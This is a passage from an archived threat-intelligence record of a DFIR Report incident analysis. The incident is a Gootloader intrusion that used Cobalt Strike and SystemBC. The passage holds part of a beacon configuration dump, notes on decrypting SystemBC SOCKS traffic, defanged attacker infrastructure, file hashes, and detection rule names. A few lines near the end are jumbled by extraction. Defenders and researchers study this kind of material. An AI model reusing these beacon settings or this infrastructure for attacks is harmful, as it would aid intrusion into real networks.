\"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 17500,\r\n \"startrwx\": false,\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 45 of 54\n\n\"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": 0,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": \"\\\\\\\\.\\\\pipe\\\\mojo.5688.8052.1838949397870888770b\",\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nSystemBC\r\nDuring the intrusion a PowerShell script named ‘s5.ps1’ was dropped to a users ‘AppData\\Roaming’ folder.\r\ns5.ps1 turned out to be a PowerShell version of SystemBC as described by Proofpoint. This PowerShell version\r\nhas been appearing more frequently over the past few years [1,2,3].\r\nHaving a PCAP of the traffic, we could decrypt it and see that inside, it was running SOCKS v5 traffic.\r\nThe first 50 bytes of the first data packet are the encryption key starting with 0x00 and ending with 0x3a:\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 46 of 54\n\nUsing that key to decrypt the first answer packet shows that this is SOCKS v5 traffic and it also reveals the\r\ndomain:\r\nx05 -\u003e Version 5\r\nx01 -\u003e Command Code 1\r\nx00 -\u003e Reserved\r\nx03 -\u003e Address Type\r\nx05 -\u003e Length of Domain (domain name redacted)\r\nApproximately four minutes after the script was dropped, SOCKS (SystemBC) was utilized to tunnel network\r\nconnections from the external IPv4 91.92.136[.]20:4001 to the domain controller via a compromised endpoint.\r\nThe endpoint was configured to execute a PowerShell script [s5.ps1] that established a SOCKS connection to the\r\nattacker-controlled infrastructure.\r\nThe process and C2 activity can be illustrated as:\r\nThe script had the following indicators for the IPv4 and Port:\r\nThe SOCKS tunnel provided the following connectivity from the attacker computer and allowed RDP [3389] to be\r\ntraversed externally.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 47 of 54\n\nA side effect of utilizing a proxy (SOCKS tunnel) on the endpoint is unusual port allocations, for example,\r\nPowerShell talking to port 3389. In this case, RDP was used to tunnel to the Domain Controller via the\r\nPowerShell process, which used port 3389.\r\nThe activity did expose the attacker’s computer name via Windows eventID 4778, with the name being\r\n‘DESKTOP-GRALDC5’. The client address referred to the proxy endpoint, an private IPv4 address.\r\nDuring the intrusion we also observed a second\r\nhostname appear ‘HOME-PC.’ This was also found via RDP access related logins.\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 48 of 54\n\nBased on the SRUM (System Resource Utility Monitor), with the SOCKS tunnel utilized, the attacker was most\r\nactive from 0600 UTC to 1100 UTC on the second day of the intrusion.\r\nDuring the intrusion, it was observed that two different attacker computer names were used, ‘DESKTOP-GRALDC5’ and ‘HOME-PC’.\r\nTimeline\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 49 of 54\n\nDiamond Model\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 50 of 54\n\nSubmit your feedback on this report for a chance to win free swag!\r\nIndicators\r\nAtomic\r\nGootloader\r\nhxxps[:]//hrclubphilippines[.]com/xmlrpc.php\r\nhxxps[:]//mediacratia[.]ru/xmlrpc.php\r\nhxxps[:]//daraltanweer[.]com/xmlrpc.php\r\nhxxps[:]//ukrainians[.]today/xmlrpc.php\r\nhxxps[:]//my-little-kitchen[.]com/xmlrpc.php\r\nhxxps[:]//montages[.]no/xmlrpc.php\r\nhxxps[:]//pocketofpreschool[.]com/xmlrpc.php\r\nhxxp[:]//blog[.]lilianpraskova[.]cz/xmlrpc.php\r\nhxxps[:]//sitmeanssit[.]com/xmlrpc.php\r\nhxxp[:]//artmodel[.]com[.]ua/xmlrpc.php\r\nCobalt Strike\r\n91.215.85[.]143:443\r\nSystemBC C2\r\n91.92.136[.]20:4001\r\nComputed\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 51 of 54\n\nImplied_employment_agreement_70159.zip\r\nfb6e4f75763fad6d0e7fe85a563b0c24\r\n7e8543f2bc09bf320510fde5e34e32065339d9d2\r\n873dd1dcdfcbe9826b274c5880f5be81a878ee93715fbb18a654d9dba61c5dfc\r\nimplied employment agreement 24230.js\r\ndeb24dfaf8178fda2d070aba9134a30c\r\necc0b26106703e129fb1e2ec132c373870c2e7b6\r\nf94048917ac75709452040754bb3d1a0aff919f7c2b4b42c5163c7bdb1fbf346\r\nFrontline Management.js\r\n4f4ee823a8c7e2511f05b3ea633c0d2c\r\n877515fecc14ed193167e8a20c6b9a684a74564d\r\necc7f13c3f0f8d4775e05715810b0164c52b7bd233e4a2e4f5a37769becb0092\r\nstage1 (geRBAdXTDCkN)\r\nmd5sum payload1.dll_: 25b38e45df3cd215386077850c59be07\r\nsha1sum payload1.dll_: a88a28c73aa42956c9f9d12585a8de63d4a00e47\r\nsha256sum payload1.dll_: 68dd1a2da732d56b0618f8581502fcf209b1c828c97d05f239c98d55bb78b562\r\nstage2 (cbkSBtbjQBNFy)\r\nmd5sum payload2.exe_: 1b8b4f05058ac39091b99cc153ab00c0\r\nsha1sum payload2.exe_: e0b568a3e35257cd30b0c42727c3529cef13b081\r\nsha256sum payload2.exe_: 831955bd05186381a8f15539a41f48166873eab3feb55fb1104202e4152bd507\r\ne544944.exe - CS beacon\r\nmd5sum e544944.exe: f769cb73317421c290832777c9e14f92\r\nsha1sum e544944.exe: f043898fc9db6985c4ad8bb84669c081cdaa8e6f e544944.exe\r\nsha256sum e544944.exe: 40c40495434bf987b04f0742c3e9201189675d87a042aa72abbd0084c3de66d8\r\nimphash: 49145e436aa571021bb1c7b727f8b049\r\n5d78365.exe - CS beacon\r\nmd5sum 5d78365.exe: 9f9c7b2c8f245e62a08bf5f8a3eb3498\r\nsha1sum 5d78365.exe: 3cf851eb09c934cafe9b98d4706f903dff804b0c\r\nsha256sum 5d78365.exe: aad75498679aada9ee2179a8824291e3b4781d5683c2fa5b3ec92267ce4a4a33\r\nimphash: 49145e436aa571021bb1c7b727f8b049\r\ndae50de.exe - CS beacon\r\nmd5sum dae50de.exe: a617e6687ab5d747c530b930bb4a3209\r\nsha1sum dae50de.exe: d53e550b54c08606e19965a9f74bbaa7063e10f1\r\nsha256sum dae50de.exe: be3222219f029b47120390b2b1ad46ae86287e64a1f7228d6b2ffd89345a889e\r\nimphash: 49145e436aa571021bb1c7b727f8b049\r\na4a2ea4.exe - CS beacon\r\nmd5sum a4a2ea4.exe: e9fc0203d1dea15dff56a285d0f86b62\r\nsha1sum a4a2ea4.exe: 72076af2ce8df6f8b1121c38f3c3db043c540369\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 52 of 54\n\nsha256sum a4a2ea4.exe: 792a95234b01c256019b16a242b9487b99e98ed8a955eaecf1e44b0141aa12f4\r\nimphash: 49145e436aa571021bb1c7b727f8b049\r\nDetections\r\nNetwork\r\nET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET MALWARE SystemBC Powershell bot registration\r\nET POLICY Powershell Command With Hidden Window Argument Over SMB - Likely Lateral Movement\r\nET HUNTING Possible Powershell .ps1 Script Use Over SMB\r\nET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File\r\nET POLICY Possible Powershell .ps1 Script Use Over SMB\r\nET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement\r\nET POLICY Powershell Command With No Profile Argument Over SMB - Likely Lateral Movement\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\n92f0538f-ad13-4776-9366-b7351d51c4b8 : Disable Windows Defender via Service\r\n81cfbbae-5e93-4934-84a2-e6a26f85c7bb : JavaScript Execution Using MSDOS 8.3 File Notation\r\nDFIR Private Rules:\r\n8537a157-5c6c-4173-9e65-943ff82c1efb : New Remote Access Configuration via netsh.exe\r\nb17dc721-6e2d-4f2c-aaf5-4cbdcdfed6f5 : Remote Password File Access via Notepad or Wordpad\r\nSigma Repo:\r\nd7a95147-145f-4678-b85d-d1ff4a3bb3f6 : CobaltStrike Service Installations - Security\r\n3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b : Use NTFS Short Name in Image\r\n88f680b8-070e-402c-ae11-d2914f2257f1 : PowerShell Base64 Encoded IEX Cmdlet\r\n1ec65a5f-9473-4f12-97da-622044d6df21 : Powershell Defender Disable Scan Feature\r\necbc5e16-58e0-4521-9c60-eb9a7ea4ad34 : Meterpreter or Cobalt Strike Getsystem Service Installation -\r\n5ef9853e-4d0e-4a70-846f-a9ca37d876da : Potential Credential Dumping Activity Via LSASS\r\n962fe167-e48d-4fd6-9974-11e5b9a5d6d1 : LSASS Access From Non System Account\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 53 of 54\n\na2863fbc-d5cb-48d5-83fb-d976d4b1743b : RDP Sensitive Settings Changed to Zero\r\nd6ce7ebd-260b-4323-9768-a9631c8d4db2 : RestrictedAdminMode Registry Value Tampering\r\ned74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools\r\n01aeb693-138d-49d2-9403-c4f52d7d3d62 : RDP Connection Allowed Via Netsh.EXE\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/19530/19530.yar\r\nMITRE ATT\u0026CK\r\nInternal case #19530\r\nSource: https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nhttps://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/\r\nPage 54 of 54\n\n https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/   \nBelow depicts the process of the start of the Gootloader infection:\nExecution    \nGootloader employs several executions across the whole infection chain.\n   Page 5 of 54\n\nhas been appearing Having a PCAP more frequently of the traffic, we over the past could decrypt few years [1,2,3]. it and see that inside, it was running SOCKS v5 traffic.\nThe first 50 bytes of the first data packet are the encryption key starting with 0x00 and ending with 0x3a:\n   Page 46 of 54",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/"
	],
	"report_names": [
		"seo-poisoning-to-domain-control-the-gootloader-saga-continues"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775441522,
	"ts_updated_at": 1775826744,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/98656c9d160044911262ba48761c147e58a78340.pdf",
		"text": "https://archive.orkl.eu/98656c9d160044911262ba48761c147e58a78340.txt",
		"img": "https://archive.orkl.eu/98656c9d160044911262ba48761c147e58a78340.jpg"
	}
}